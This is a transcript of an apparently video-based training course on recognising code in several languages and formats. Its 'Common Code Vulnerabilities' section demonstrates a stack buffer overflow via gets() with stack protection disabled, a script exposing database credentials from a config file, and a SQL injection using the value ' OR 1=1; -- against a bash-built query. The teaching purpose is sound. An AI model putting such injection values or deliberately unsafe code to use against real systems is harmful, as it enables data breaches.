chmod +x hello_world.py. And now I can just do a ./hello_world.py. And because of the shebang at
the top saying that it's a Python3 script, our shell environment knows how to execute it. So now let's have a
look at the other example. I'll type nano of hello_world2.
[Video description begins] The hello_world2.py file opens. It has thirteen lines of code. [Video description
ends]
So in this example, the main difference is the shebang: we have the octothorpe or hash, followed by !, and then /usr/bin/python.
So this is going to run Python directly, but in this case, it's python2. So in this format it is typically python2,
even though at the time of this recording, python2 has reached end of life. So it's no longer officially
supported. But it does a lot of the same things with some minor differences. So we have an import of sys that's
the same as our python3 script.
[Video description begins] He points at code line 2. [Video description ends]
The function is defined similarly, except I've called this hello_you, and it takes the argument param.
And then the print statement inside of this function. The big difference here is there's no open and close
parentheses.
[Video description begins] He points at code line 5. It reads: print "Hello, {}!".format(param). [Video
description ends]
So print is a special kind of statement in python2, whereas in python3, we have to treat it as an actual function
for it to work. So quite often, you can run some python2 and python3 code interchangeably, but this is one of
the cases where you can't. If you try to run this as python3, it would fail because there are no open and close parentheses around the string. So one important way of identifying python2 code as opposed to python3 code is the absence of the parentheses in the print. And then I go on to print Hello, World, and I call hello_you with
Steve as the argument.
[Video description begins] He points at code line 7. He points at code line 9. [Video description ends]
And then if true I print Exiting, followed by the ellipsis, just as they did in the other program, and I call
sys.exit.
[Video description begins] He points at code lines 11 and 12. He points at code line 13. [Video description
ends]
If you haven't noticed already, the print statements here are using strings with double quotes, whereas in the python3 example, there were single quotes.
[Video description begins] He points at code line 12. [Video description ends]
Now it doesn't really matter. I can use single quotes or double quotes, as long as they open and close with the
same style quote. I can put single quotes or double quotes in python2 or 3, and it works just the same. So I'll
exit out of this. And now I'll do python of hello_world2.py. And I get Hello, World!, Hello, Steve! and Exiting
as expected. Well, let's try python3 of hello_world2.py. And it fails.
So we get a SyntaxError on the print statement, because there are no parentheses around it. But that's because it doesn't know what to do with the print statement without the parentheses. Now let's try it the other way around.
If I type python of hello_world.py, it actually works.
[Video description begins] Three lines of output appears. [Video description ends]
It actually runs the python3 example in python2. Now, this doesn't always work. It only works in the case
when the python3 code doesn't have anything particularly special to python3. So it could be still valid python2,
but you still have to be careful. And that concludes this demonstration of identifying Python scripts.
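From the shell side, a few quick checks like these are often enough to tell which interpreter a script expects (a sketch; the file names are the ones from this demo):

head -n 1 hello_world.py                      # show the shebang, e.g. #!/usr/bin/env python3
head -n 1 hello_world2.py                     # e.g. #!/usr/bin/python, which typically means python2
grep -n 'print ' hello_world2.py              # print without parentheses usually signals python2 code
python3 hello_world.py                        # run explicitly with the Python 3 interpreter
chmod +x hello_world.py && ./hello_world.py   # or make it executable and let the shebang decide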
[Video description begins] Topic title: Identifying C programs. Your host for the session is Steve Scott. [Video
description ends]
In this video, I'll describe the elements that make up a common C program.
[Video description begins] A terminal window opens. The command prompt is:
steve@vm1:~/Documents/identifying_c_programs$. [Video description ends]
So in my current folder, identifying_c_programs, I'm going to run ls in this terminal window and have a look
at some of the files. Now a number of these files are common files associated with the GNU Autotools collection, such as the configure.scan, the configure.ac, the Makefile.am, and the Makefile.in. So these are to
manage dependencies and build parameters that support common C programs. Now there are different build
tools and make files, this is just one example. You can even take the C file hello_world.c and compile it
directly with a C compiler.
But this doesn't typically scale when you want to target different platforms and environments. Most often when
you download C source code for a program with Makefiles and a configure script, you type ./configure like I
did here. Then run make if there's anything to be done. Now since this has already been compiled, it says
there's nothing to be done. If you want to do a clean make you do make clean and it removes the program and
the object files. And now I can run make.
[Video description begins] The following output appears: rm -f hello_world *.o. Then, after running make, the compile command appears: cc hello_world.c -o hello_world. [Video description ends]
And typical software packages have a make install program to install the program from source onto your
computer. Now the files will look a lot like this or at least somewhat similar. Now each build system has its
own particulars and some have different approaches. And this is also similar for C++ programs. But let's look
at the C file itself and see what makes up a common C program. So I'll run nano on hello_world.c.
[Video description begins] The hello_world.c file opens. It has twenty six lines of code. [Video description
ends]
The first line in this case starts with a comment, /* Hello, World */, where the /* opens and the */ ends the comment block. Now this style of comment can also span multiple lines if you wish; anything within the block is a comment. Now after this leading comment, we have an include directive. So this is an include pre-processor statement.
[Video description begins] He points at code line 2. [Video description ends]
Before a compiler actually compiles the C source code, it brings in code from the header files, typically files
with the .h extension, to allow you to bring in existing code and libraries from other sources. Almost all C
programs have include files and these are two of the more common ones. So it's written #include, and then in
angle brackets, so < and > we have the file. So stdio.h and stdlib.h.
[Video description begins] He highlights code lines 2 and 3. [Video description ends]
Then we define a main function. So this is the main entry point into the application.
It always returns int so we have int main, so main all in lowercase. And then we define its parameters in
parentheses. Now typical C programs have either no parameters defined in its main function or it has int argc,
char, C-H-A-R, * and then argv followed by [ ]. So argc is the number of arguments. So if you type the
command, followed by some command line arguments or options, they get passed through these variables.
argc has the number of them passed and argv has their values, so c for count and v for values. Then the first
line we call printf. So this causes it to print it to the standard output with Hello, World!.
Now, the printf command doesn't automatically put a new line. We have to explicitly tell it to by putting a \n
character to say print a new line at the end. Then I define a pointer. So a pointer is a pointer to some memory
location, and it's declared with an asterisk on the variable.
So this int pointer, so an integer pointer called p, so int *p followed by a semi-colon. That's another important
thing about C programs, is every statement ends in a semi-colon. Another thing we need to do for pointers is
allocate memory for them. The function to allocate memory in C, which comes from the stdlib header, is
malloc for memory allocation.
[Video description begins] He points at code line 11. [Video description ends]
So I have p =, and I give it the type, so (int *); this is called casting. So it takes the memory returned by malloc and points to it with an int pointer. So we have malloc, then the amount of memory we want to allocate. We want to allocate 10 * sizeof(int). So we want enough bytes for the size of an integer ten times. So that'd be space in p to hold ten integers. At this point, if p is null, so we have if p==NULL. So if it's equivalent to null, it means that the memory wasn't allocated correctly, so p is set to a null pointer.
[Video description begins] He points at code line 12. [Video description ends]
If this is the case, we do a printf of memory allocation error and then we call exit(0).
[Video description begins] He points at code line 13. He points at code line 14. [Video description ends]
So this will exit the program at this point. Otherwise it'll do a printf of memory allocated for p.
[Video description begins] He points at code line 16. [Video description ends]
And then I have a comment saying do something with p.
[Video description begins] He points at code line 18. [Video description ends]
So typically something would be done with p. And then once we're done with it, we free the allocated memory
by calling free.
[Video description begins] He points at code lines 20 and 21. [Video description ends]
[Video description begins] He points at code line 22. [Video description ends]
[Video description begins] He points at code line 24. [Video description ends]
Then at the end we return 0. So the success status of a program is 0 and anything else is a failure. That is, 0 means no failure, so it returned
successfully. And then we close our main function with a closing brace that matches up with the opening brace
of our main function.
[Video description begins] He points at code line 25. [Video description ends]
So code blocks in functions or methods are defined within the curly braces. So let's close this now and we'll
run ./hello_world. And that prints the output from our program. So we have hello world, memory allocated for
p, and memory freed successfully. And that concludes this demonstration of identifying C programs.
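For reference, the build-and-run flow from this demonstration looks roughly like this at the shell (a sketch; the Autotools files and the hello_world.c source are the ones shown above):

./configure                       # generate the Makefile for this system
make                              # compile, e.g. cc hello_world.c -o hello_world
make clean                        # remove the program and the object files
cc hello_world.c -o hello_world   # or compile the single source file directly with a C compiler
./hello_world                     # run the resulting program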
[Video description begins] Topic title: Identifying C++ programs. Your host for the session is Steve
Scott. [Video description ends]
In this video, I'll describe elements of a typical C++ program so you can easily identify one when you see it.
[Video description begins] A terminal window opens. The command prompt is:
steve@vm1:~/Documents/identifying_cpp_programs$. [Video description ends]
So let's start in this folder identifying cpp programs and we'll run ls.
So the files in this folder are very much like those of the C program in the video titled Identifying C Programs. We have the configure script and the Makefiles of the build tools, using Autotools for GNU Make. And to
build it, we would do a ./configure, and then make or make clean if we want to clean the files and make it
again. So a very typical compilation procedure using make. But before we run it, let's have a look at the C++ source code in the hello_world.cpp file. Now, typically C programs have the .c extension and C++ programs have the .cpp extension. So I'll use nano to open
hello_world.cpp. So this is a very simple C++ file.
[Video description begins] The hello_world.cpp file opens. It has eight lines of code. [Video description ends]
And at the top of it, we have an include preprocessor directive. We have the # symbol include just as we do in
C programs.
And then in <>, we have the standard library include from iostream for input/output stream. Now typically
standard library includes have angle brackets, but no .h extension like we do with C. Now although we could
do that, we could include stdio.h.
[Video description begins] He enters a code in line 2. The succeeding code lines shift a line down. [Video
description ends]
We can use some of the C includes inside of c++, but most often we want to stick to the c++ standard library
includes. But there is some portability between the two.
[Video description begins] He removes code line 2. The succeeding code lines shift a line above. [Video
description ends]
So I'll save this again and the main function is identical to a C program.
So we have int main, and in parentheses we have the parameters int argc, the argument count, and then we
have char* of argv with the square brackets. So we have the argument values, if these arguments are passed to the function. When we print to the standard output, we don't use printf in C++, well not typically. We usually
use the iostream cout.
There's also a namespace specifier followed by the double colon. So we have std for standard, then ::cout for output. And then we have this operator, the double angle bracket operator, <<. Then we have the string "Hello, World!" followed by another output operator, so << again, and then std::endl for end line. Now we can also put
the end line right inside of our "Hello, World!" and put a \n, it works the same way as it would in C. But we
also have this special specifier from the iostream library for ending a line and then we return zero for success.
And you'll notice that the statements in C++ like C also have semi colons to close them and functions are
enclosed in braces.
[Video description begins] He points at code lines 3 and 8. [Video description ends]
Another thing we see quite often is using namespace directives. So we could type using namespace std; then
we can remove the std:: specifiers and just have cout and endl, so we see this quite often as well.
[Video description begins] He enters a code in line 2. The succeeding code lines shift a line down. [Video
description ends]
[Video description begins] He modifies code line 6. It now reads: cout << "Hello, World!" << endl;. [Video
description ends]
But this makes up a common C++ program and what differentiates it from a common C program. Then I'll save this, I'll remake it, and now I'll run hello_world to make sure we get the output Hello, World!, and we do.
[Video description begins] The hello_world.cpp file closes. The screen shifts back to the terminal. [Video
description ends]
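The equivalent flow for the C++ example would look something like this (a sketch; it assumes a C++ compiler such as g++ is installed, and the file name matches the demo):

./configure && make                  # the same Autotools flow as the C example
g++ hello_world.cpp -o hello_world   # or compile the single source file directly with a C++ compiler
./hello_world                        # prints Hello, World!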
Upon completion of this video, you will be able to describe the similarities and differences of C# when
compared to C and C++.
Objectives
[Video description begins] Topic title: Identifying C# programs. Your host for this session is Steve
Scott. [Video description ends]
In this video, I'll describe similarities and differences of C# when compared to C and C++. So C sharp is
written with the C and the hash symbol, and pronounced C sharp. It's a general-purpose multi-paradigm programming language. The general purpose part of this description comes from the fact it's used for many different applications: for GUI applications on PCs, server applications, web applications, and basic scripting.
It's also multi-paradigm, in that it has options to program imperatively, functionally, with the use of
declarative, generic, and object oriented constructs. It's also strongly typed, which means variables must have
an associated type, or be declared with an implicit type using the var keyword. So C# is both similar to and heavily influenced by C, C++ and Java. C# was introduced around the year 2000. I felt at the time it was a
response to Java with similarities, and targeting the same space of the developer mindshare. It was Microsoft's
response to Java.
But since then, it has forged its own path both influencing the development of C++ and Java and being
influenced by these other languages by C, C++, and Java. So what are some of the common syntax elements of
C#? This is where the similarities to other languages such as C, C++, and Java show up. Statements end with a
semicolon. Blocks are defined within curly braces. Square brackets are used for indexed notation as in arrays,
and it has other things that are similar to the C-style languages, especially C, C++ and Java. But there are some identifying features unique to C#. There are no global variables in C#, and that's not the
case in C and C++. There's implicit variable declarations. It supports implicit declarations using the var
keyword so that the type can be inferred. We have type safety. So C# is more strict than C and C++, in that
type conversion must also be safe, and it's enforced not only at compile time but often in runtime as well. And
there's no variable shadowing, so you can't have variables of the same name on different block levels inside of the same scope. So you can't have one outside of the block and one inside with the same name. This is allowed in C and C++, but not in C#. Now, let's have a look at some code.
[Video description begins] A screenshot appears on the screen. It has some code lines. [Video description
ends]
The first line you see in many C# programs is a using statement like using System. So in C#, the using
keyword includes external packages in the program as well as the namespace. This differs from C and C++
where we most often see the include keyword as the first statement in our code. And in Java and Python, you
see import keywords used for this purpose at the top of a program. To specify the namespace for a class, we
use the namespace keyword. So we're defining a namespace here. And then the body of the namespace is in
curly braces.
And then we usually have a class, as here I have class Hello. Then another block that opens the definition of
the class which defines a main method. So this is the main entry point. So C, C++, and Java all have these
main entry points. But they're all defined slightly differently. Now this one looks a little bit more like Java's
but it is very different from C and C++. So in C and C++, the main function is not within a class, and C and C++ return an int and main is in lowercase. And then we have our body of the method, also with an open brace.
Then to write to the standard output, we have Console.Write and then some string. In Java, we would have
System.out.write. In C, we typically use printf. And in C++, we use cout. And then we have to make sure all of
the braces are closed, to close out these methods. And that concludes this presentation on identifying C#
programs.
[Video description begins] Topic title: Identifying Regular Expressions. Your host for this session is Steve
Scott. [Video description ends]
In this video, I'll discuss identifying regular expressions found in typical regex engines. So how do we usually
think about regular expressions? Well, we think of them as search patterns to find something, to find a word, a
bunch of characters, numbers, any text within a larger corpus. For example, you might be looking for
combinations of letters and numbers, say five digit zip codes or five or six letter number combinations for
postal codes in some countries. Or matching emails or URLs, or IP address formats.
Not just to find them but also to verify their validity. So regular expressions solve the problems of Find, and of Find and Replace, so performing substitutions. You can think of a regular expression find and replace task as
either a straight substitution of words, or expressed in a pattern much the same as a find and replace would be
performed on a document using a GUI application. So in a word processing application, it gives you a visual
way to accomplish the find and replace task.
In a command line script or program, incorporating a regular expression gives you a programmatic way to
automate the substitution so we can do it in code. What makes up or defines regular expressions? Well, we can
think of them as formal languages. So it's defined formally, mathematically, in terms of Formal language
theory. And the syntactic structure of how the grammar of regular expressions is defined is done in such a way
that it can be analyzed systematically. It's expressive and compact, giving a concise way to express matches and operations to determine matches based on character combinations. And there are standards behind regular expression syntax. So there's the IEEE POSIX standard and extended regular expressions, with implementations following these. Now what are some of the ways that we
can describe the conceptual elements of regular expressions? In the language of regular expressions we get the
Boolean "or". So given a set of characters or strings or patterns, we can match alternatives using a logical or
typically denoted with the pipe character.
We get Concise groupings, using parentheses as we would in logical or mathematical expressions to control
operator precedence. So we can group characters, quantifiers, and wildcards together. We have Quantifiers
usually question marks, asterisks, plus signs, and braces with min and max numbers. These determine how
characters and groups of characters are matched. And we have Wildcards such as the period or dot operator,
which can match single or multiple characters when combined with other quantifiers.
Each implementation of regular expressions has its own flavor or syntax for expressions which can be
confusing, but they all generally provide the same conceptual elements. They're all similar in features but not
always with the same syntax. So in a typical POSIX standard, the meta characters or important symbols are as
follows. We get the backslash '\' escape character. So if we need to include a backslash in our regular
expression, we have to escape it with a backslash.
The ? which matches the preceding element zero or one time, the * which matches preceding element zero or
more times, the + operator which matches the preceding element one or more times. The ^ matches the starting position of any line. The . matches any single character. We have [] bracketed expressions using the brackets. And we have the [^] bracketed not expression with the caret. And we have a $ sign that matches,
which looks for a match at the end of a line or the end of a string. Now what are some examples of how these
are implemented?
Well .ing would match words ending in 'ing' like ting and zing, ping, etc. If we have [tc] with 'rying', this will
match the words 'trying' and 'crying'. If we have the [^p] followed by ing, we'll have all the same matchings
as .ing except for 'ping'. fox$ matches any lines ending in 'fox', and ^Fire matches any lines starting with 'Fire'.
Of course there are extensions and additions based on what you've seen here, but all implementations of
regular expression engines are based upon these foundations. And that concludes this presentation on
identifying regular expressions.
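These example patterns can be tried from the shell with grep (a sketch; words.txt is a hypothetical file containing sample words and lines):

grep '.ing' words.txt        # any character followed by ing: ting, zing, ping, and so on
grep '[tc]rying' words.txt   # matches trying and crying
grep '[^p]ing' words.txt     # the same matches as .ing, except ping
grep 'fox$' words.txt        # lines ending in fox
grep '^Fire' words.txt       # lines starting with Fire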
During this video, you will learn how to identify PowerShell scripts based on their features.
Objectives
[Video description begins] Topic title: Identifying PowerShell Scripts. Your host for this session is Steve
Scott. [Video description ends]
In this video, I'll discuss how to identify PowerShell scripts based on their features. So let's start by talking
about the main elements that define PowerShell. We start with Shell commands called cmdlets. But they're not
typical commands, such as what you would find in Bash or other Shell environments. It's better to think of
them as command classes that process objects as input and return objects as output. They're based on
the .NET framework classes that run in the PowerShell runtime. Then we have Pipelines, connecting
commands together.
Again, like you would see in other shells like Bash, but instead of passing strings between commands, you pass
objects. Then we have PowerShell Scripting, that's built on top of .NET with full featured language
capabilities, variables, operators, loops, associative arrays, and regular expressions. And in PowerShell scripts,
these can be built, tested, and debugged in an integrated scripting environment, or ISE. Now, what are
some more important features of PowerShell? Well, we have the .NET integration.
This is what gives PowerShell and commandlets their capabilities. So we can do much of what can be
accomplished, in an equivalent GUI application, and sometimes more. That makes Administrative task
automation easy, so you can automate repetitive manual steps using PowerShell scripts, and Configuration
management. So we can use PowerShell scripts to configure our computers, our PCs and our servers. So what
are some of the main elements of the PowerShell design? So we get Discoverability.
So it's improved over some other Shell environments. And we use the Get-Command and Get-Help to achieve
this. Consistency, PowerShell uses a Verb-Object naming convention for commands in a consistent interface
through the commandlets, so that any inconsistencies of the underlined .NET or component object model
objects can be obstructed away. It's Scripted and interactive. So .NET and command line tools have developed
in environments to help. PowerShell can use command line tools, comm objects, dotnet classes.
So we combine the best of interactive Shells, scripting and system administration into a single tool. And in this
case, the Powershell integrated scripting environment is an application in modern Windows that we can use.
The nice thing about this, as I mentioned, in the Powershell design, it makes discoverability much easier. So
one of the advantages of using the ISE is its GUI environment. We can often navigate visually through the
application through menus, dropdowns, tabs, help, etc., to find what we're looking for and discover capabilities
by trying things.
There are many shell environments where we don't have this. With the Windows PowerShell ISE, some of that
gap is closed and we can discover and explore various commands visually. Even though the end target is a text
driven interface or a PowerShell script. And that concludes this demonstration of identifying PowerShell
scripts.
[Video description begins] Topic title: Identifying SQL Code. Your host for the session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to identify the elements of a SQL statement.
[Video description begins] A terminal window opens. The command prompt is:
steve@vm1:~/Documents/identifying_sql_code$. [Video description ends]
Now, there are SQL standards and some variations, depending on the database management system and the flavor of SQL one uses. In this example, I'll demonstrate using SQLite, which is a brilliant little tool to manage local databases in file form without servers or worries about multi-user environments, which makes it a great way to demonstrate this. When you need a database for a single-user application or a personal database of things,
SQLite is a good tool.
It also makes it easy to demonstrate some basic SQL without having to do a major install. On an Ubuntu or a
Debian-based system, you can do sudo apt install sqlite3. Now I already have it installed, so I don't need to run
that command, I just need to type sqlite3 to run it. Now before I do that, in my current folder, I have a file
called person.sql.
[Video description begins] He enters the ls command. A file named person.sql appears in the output. [Video
description ends]
Now most often, when you see this, where there's a SQL extension, it means it's a text file with SQL
statements in it. So let's open this up with nano and have a look.
[Video description begins] The person.sql file opens. It has fourteen lines of code. [Video description ends]
Now, the first line has a --SQLite SQL script. So the -- is a comment, so whatever comes after it is a comment.
You can also have C style comments with /* and */ to close it. So anything within the confines of the /*, you
can have comments to explain what's going on.
Now the first statement is a create table statement. So we have create table, and then the name of the table.
So this will be tabular data of people, so we call it person. And then in parentheses, we define the columns or
fields within the table. So the first field is id, it's of type integer, it's a primary key, which means it must be
unique. And it's in autoincrement.
So it'll start off at one, and for each user, it will increment that, two, three, four, five, etc, each time we add a
new person. It has a name field, which is of type text, and it's set to not null.
So this specifier says this can't be a null value. So we have to have a string in this record, as well as email. So
we have, email text not null.
And then we close the statement, we close the parentheses defining the definition of the person table, and end
it with a semicolon.
[Video description begins] He points at code line 11. [Video description ends]
The next statement is an insert into the person table. I don't have to specify the id column because it's going to be autopopulated with the autoincrement. It has the keyword values and, in parentheses, I have the string in single quotes 'Steve', then '[email protected]', also in single quotes. Then I close the parentheses, and I end the statement with a semicolon. And I do this exact same thing
with values for Robert and [email protected], Jessica and [email protected], and Jane with
[email protected].
[Video description begins] He points at code lines 12-14. [Video description ends]
So those are the four users I'd like to insert into our table. So now I'll exit out, and to run this, I can do sqlite3,
then I specify a database name.
[Video description begins] The person.sql file closes. The screen shifts back to the terminal window. [Video
description ends]
I'm going to call this person.sqlite. And then I use my input redirection operator, so the < symbol, and then the
file, person.sql. So this will run the commands on this database. And now if I do an ls, I have person.sqlite
created and I can open it running, sqlite3 person.sqlite.
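Before looking at the queries, here is a hedged reconstruction of the person.sql file and the commands just described; the email addresses are hypothetical placeholders, since the originals aren't shown verbatim in the video:

```bash
# Recreate the person.sql file as narrated (placeholder email domains).
cat > person.sql << 'EOF'
-- SQLite SQL script
CREATE TABLE person (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    name TEXT NOT NULL,
    email TEXT NOT NULL
);

INSERT INTO person (name, email) VALUES ('Steve', 'steve@example.com');
INSERT INTO person (name, email) VALUES ('Robert', 'robert@example.com');
INSERT INTO person (name, email) VALUES ('Jessica', 'jessica@example.com');
INSERT INTO person (name, email) VALUES ('Jane', 'jane@example.com');
EOF

# Run the statements against a new database file, then inspect it.
sqlite3 person.sqlite < person.sql
sqlite3 person.sqlite '.schema'
sqlite3 person.sqlite 'SELECT * FROM person;'
```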
[Video description begins] The command prompt changes to sqlite>. [Video description ends]
And then I get into a sqlite command line interface. So I can type .help to get help, and I can run things
like .schema, which will show me the schema or the definitions of the tables and entities within the database.
So I have a table called person that we created, but it also creates another table called sqlite_sequence so that it
can maintain the number of the autoincrement for us. And now if I do a select * from person, another SQL
statement, ending it with a semicolon, it selects all the people from the person table.
So we have 1, 2, 3, 4, so their ID, their names, and their email addresses. Now, some other SQL commands that you might come across are delete, so we delete from person, so delete from a table where name = 'Steve'. So SQL statements follow this very command-driven, declarative style, and inside of sqlite I can arrow up and rerun commands. So you can see now, if I select * from person, Steve is gone. I can also do wildcard searches, so select * from person where name like, and in single quotes, I put 'J%'. With % being the wildcard, it selects all names that begin with J, so I get Jessica and Jane.
And I can also specify fields, I can say, select name from person, and it will just return the names. So these are
all examples of SQL statements and SQL code. So if you see statements, create table, insert, update, delete,
select from a particular entity with where clauses, you're most likely dealing with SQL statements. And that
concludes this demonstration of identifying SQL code.
[Video description begins] Topic title: Common Code Vulnerabilities. Your host for the session is Steve
Scott. [Video description ends]
In this video, I'll describe common security vulnerabilities in code that can lead to exploits.
[Video description begins] A terminal window opens. The command prompt is:
steve@vm1:~/Documents/common_code_vulnerabilities$. [Video description ends]
So, I'll start with the C buffer overflow. So I've called this buffer_overflow.c. So I'm going to open it up with
nano.
[Video description begins] A file named buffer_overflow.c opens. It has thirteen lines of code. [Video
description ends]
And we can see what's going to happen here. I start with an include of stdio.h, and I include string.h.
[Video description begins] He points at code lines 1 and 2. [Video description ends]
Then in the main function, I declare a char buffer of size 5. So I've char buffer in square brackets, it's 5.
So this can hold 4 characters and a null terminator for dealing with the string, or it can handle 5 characters in
all. Then I have int ok = 1. Then I call gets with buffer as its argument.
[Video description begins] He points at code line 6. He points at code line 8. [Video description ends]
So this will accept user input. And I can type in a number of characters and it will store it in buffer. Then you
can all probably already see the problem here. If I type more than 5 characters, we're going to have a problem.
Then I do a printf of %d\n, ok.
[Video description begins] He points at code line 10. [Video description ends]
[Video description begins] He points at code line 12. [Video description ends]
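Here is a hedged reconstruction of buffer_overflow.c as narrated, along with the two compile commands used in this demo; it isn't the exact file from the video:

```bash
cat > buffer_overflow.c << 'EOF'
#include <stdio.h>
#include <string.h>

int main(void)
{
    char buffer[5];   /* room for 4 characters plus a null terminator */
    int ok = 1;

    gets(buffer);     /* unsafe: no bounds checking on user input */
    printf("%d\n", ok);

    return 0;
}
EOF

# Default build: gcc warns about gets() and adds stack-smashing protection.
gcc buffer_overflow.c -o buffer_overflow

# Build used later in the demo: disable the stack protector to see the overflow
# corrupt the ok variable.
gcc -fno-stack-protector buffer_overflow.c -o buffer_overflow
```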
So I'll exit and do a gcc of buffer_overflow.c. And I'll output it to buffer_overflow. So -o buffer_overflow. This gives us a warning saying that the gets function is dangerous and should not be used, while doing everything it can for me to prevent a buffer overflow. So if I do a ./buffer_overflow, and I type, let's say, 123456, it gives me stack smashing detected: <unknown> terminated, Aborted (core dumped).
So what's happening here is that gcc actually puts in some extra code to prevent this kind of stack smashing or
buffer overflow on the stack, which is what I'm trying to do here. Now, there's an option I can supply when I compile it: the -fno-stack-protector flag. So I'm going to remove this protection.
And now I'll run the program again, and I'll type 123456.
And then something funny happens. The variable ok outputs 54. So it does these weird sort of things. And in
this case, if I type 12345, it outputs 0. So it actually modifies the variable ok because we're going past the end
of our buffer and running into the stack space reserved for the int ok. So this is the basic idea behind
buffer_overflows at least in terms of the stack. And because this is such a common problem, mitigations for
this are built right into the compiler by default. So this is something that happens very often. Now, let's look at
another one. So in my current folder, I'll run ls. There's a few files, there's one called script.py. So let's look at
this one next. So nano of script.py.
[Video description begins] The script.py file opens. It has seven lines of code. [Video description ends]
And this is running a subprocess, a shell process from within another program. So I have this Python script.
[Video description begins] He points at code line 1. It reads: #!/usr/bin/env python3. [Video description ends]
I create a command which is equal to a list of values with cat. So that's the program that's going to run, and its parameter config.ini.
Now, what happens is, if Python is running on a web server and somewhere in the script it accepts input from the user, say to perform some task, then within its code it runs a shell command. If the user can get input into the shell command, they can execute whatever they want. So this leads to a lot of exploits as well. So here, I have result = run with the command, so cat of config.ini, stdout=PIPE, stderr=PIPE, universal_newlines=True.
[Video description begins] He points at code line 6. [Video description ends]
[Video description begins] He exits out of the script.py file. The screen shifts back to the terminal
window. [Video description ends]
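A hedged reconstruction of script.py and a stand-in config.ini (the configuration values are placeholders, not the file from the video) might look like this:

```bash
cat > script.py << 'EOF'
#!/usr/bin/env python3
from subprocess import run, PIPE

command = ['cat', 'config.ini']
result = run(command, stdout=PIPE, stderr=PIPE, universal_newlines=True)
print(result.stdout)
EOF

# Placeholder configuration file so the script has something to read.
cat > config.ini << 'EOF'
[database]
host = localhost
database = appdb
user = appuser
password = secret
EOF

chmod +x script.py
./script.py
```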
So now if I run the script, it does a cat on this config.ini file which gives some information about the database,
including the host, the database, the user, and the password. So quite often web apps have some configuration
file somewhere that declares information like database connection strings or root user accounts. And this can
be used to gain access and breach data. And now the last example is called a SQL injection attack. So this is
modifying a SQL statement to do something other than its intended behavior, which is often used to gain
access and breach data as well. So, I'm going to open up the script select person. So, nano select_person, which
is a bash script.
[Video description begins] The select_person file opens. It has seven lines of code. [Video description ends]
Then I construct a SQL query. So I have the variable query = the string select * from person where name = and, in single quotes, I have '$1'. So this will be the first parameter passed to this select_person bash script.
Then I echo the query. And then I call sqlite3 of person.sqlite and I pass this query to be executed.
[Video description begins] He points at code line 5. It reads: echo "$query". [Video description ends]
[Video description begins] The screen shifts back to the terminal window. [Video description ends]
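Here is a hedged reconstruction of the select_person script and the two calls described below, reusing the person.sqlite database from the SQL demo:

```bash
cat > select_person << 'EOF'
#!/bin/bash
query="select * from person where name = '$1'"
echo "$query"
sqlite3 person.sqlite "$query"
EOF
chmod +x select_person

# Intended use: look up a single person by name.
./select_person Jane

# Injection: the crafted argument makes the WHERE clause always true,
# so every row in the table comes back.
./select_person "' OR 1=1; --"
```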
So under normal operation, I run select_person, and I put a person's name, let's say, Jane. And it returns Jane
from the database. So select * from person where name = 'Jane'. So that looks fine. But what if I call select_person and I pass in the string ' OR 1=1; -- , so a single quote, OR 1=1, a semicolon, and then a comment marker, the two dashes. Well, this is going to do some funny things. Any select statement with a clause OR 1=1, since 1=1 is always true, will return everything.
So in this case, the query becomes select * from person where name = '' (two single quotes side by side, so name equals the empty string), but then I have OR 1=1 followed by a semicolon, and the -- comments out that final single quote, so it doesn't get parsed. And this will be just like running select * from person, so it returns everybody in the database. So, instead of the intended single person returned, it returns everyone. And we've
just breached the data from the entire person table. And that concludes this demonstration of common code
vulnerabilities.
In this video, you will learn how to identify the structure of common executable formats based on their binary
signatures.
Objectives
identify the structure of common executable formats based on their binary signatures
[Video description begins] Topic title: Identifying Binary Files. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll present some important information about how to identify the structure of common executable formats based on their binary representation. Technically speaking, all files are binary. But what we mean here are non-text files. Now, text files are binary representations of individual characters using a standard representation like Unicode. In what we call binary formats, there is no standard representation based on characters. It's based on whatever information the format has chosen to represent.
The binary information could be colors and pictures, sound descriptions of waveforms, machine instructions
and compiled computer programs, or any other representation of values that are chosen by whatever
programmer wrote the code that ultimately created the file. What are some common binary executable files?
Well, we can think of these as programs with instructions that correspond to how your operating system and
processor will execute the instructions.
We can think of compiled machine code, byte compiled code where there is a virtual machine that translates
the bytes in the file to machine code in real time such as the Java Virtual Machine, or JVM. We also have
linked libraries. Libraries have compiled code that are called by other programs. These are un-editable which
means they must be compiled from source. So you don't change a program by editing the binary executable.
You change the source code and you recompile it into the binary format.
You can view the binary format, but you need what's called a hex editor, which displays the bits within the file, in groups, as hex digits. And it's very rare that any of these would need to be edited directly,
but it is possible. What are some other binary signatures for non-executable programs? The main examples of binary files that are non-executable are images, any image format, video formats, and audio formats. It's easier to talk in terms of hexadecimal representation when talking about binary signatures.
So we're looking at values in base 16 numerical representation. So it's the digits from 0 to 9 and a to f, and each hex digit takes up four bits. So you can look at each group of four bits in a hex editor, looking at the digits in terms of their hex representation. This is an alternative to base 10 or decimal format, instead of using our normal numbers from 0 to 9 to represent each digit. It's much easier to work in base 16 because it's a power of 2. If we have the number 255 in decimal, it's represented as ff in hexadecimal.
And then if we're dealing with this in a programming language, it's often preceded with 0x to denote
hexadecimal. So if you're using C or C++, you'll write hexadecimal digits as 0x, for example, 0xff. Let's look
at some examples of Common Executable Formats and Common Non-Executable Formats that are in binary
form. Well, we have the usual exe which is quite often associated with Windows programs. We have dlls for
dynamic link library. So these are code libraries that are called by executable programs on Windows
computers.
We have .so, which is the shared object format that we typically see in a Linux environment. So this could be considered the Linux equivalent to dlls. The ipa file, so this is an Apple format for the iOS App Store package,
which packages up the executable file for an iOS app along with its other resources that are needed to run the
program. We have bin files. So this is sometimes added to a binary executable in some systems to denote that
it's a binary file. If we have a dot o file, these are object files that are created by compilers before they are
linked into the final program.
And we have Java files, the jars, the war files and the class files that package up Java programs or the classes
themselves which are the bytecode for a Java program. Now for common non-executable formats, well, for image formats we have gif, jpg, and bmp files for bitmaps. We have mp3 files which are audio files and mp4
containers which contain video formats, mov files for movies, avi files for Windows video files.
We have wav formats, which is another audio format, zip files which are archives of other files. Now the zip
file itself is a binary file. But the contents of the zip container don't necessarily need to be binary files. There
can be text files inside of a zip, but they get compressed into a particular binary format. And that concludes
this presentation on identifying binary files.
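As a small, hedged illustration of working with hex values and binary signatures from the shell (the picture.png file here is an assumed example, not one from the video):

```bash
# Decimal 255 printed as hexadecimal: ff
printf '%x\n' 255

# Dump the first bytes of files to see their magic numbers / signatures.
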